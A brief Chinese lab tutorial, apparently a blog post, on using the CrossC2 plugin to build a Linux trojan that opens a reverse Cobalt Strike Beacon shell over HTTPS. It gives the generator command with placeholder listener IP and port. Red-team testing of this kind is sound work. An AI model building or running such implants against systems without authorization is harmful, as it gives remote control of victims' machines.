一、简述
CrossC2插件是为企业和红队人员提供的安全框架,支持 CobaltStrike 对其他平台的渗透测试(Linux / MacOS /...),支持自定义模块,并包括一些常用的渗透模块。
利用CrossC2插件通过在Linux上执行木马反弹一个CobaltStrike类型的shell。
CrossC2插件项目地址:https://github.com/gloxec/CrossC2
受限描述:
-
CobaltStrike:目前仅支持 cs 3.14版本,4.0可上线无法执行其他操作。
-
Linux:对于特别旧的系统,您可以在 can 中选择"Linux-GLIBC"选项(2010 年左右)
-
MacOS:最新系统仅支持 64 位程序
二、实验
1.genCrossC2.Linux 文件上传到CobaltStrike服务端目录下。
2.由于 Cross C2目前只支持HTTPS Beacon,所以在Listenrs中选择HTTPS进行监听,
服务端开启监听 windows/beacon_https/reverse_https 类型的beacon
3.生成木马
./genCrossC2.Linux 监听的IP 监听的端口 null null Linux x64 test
4.执行木马上线
成功上线
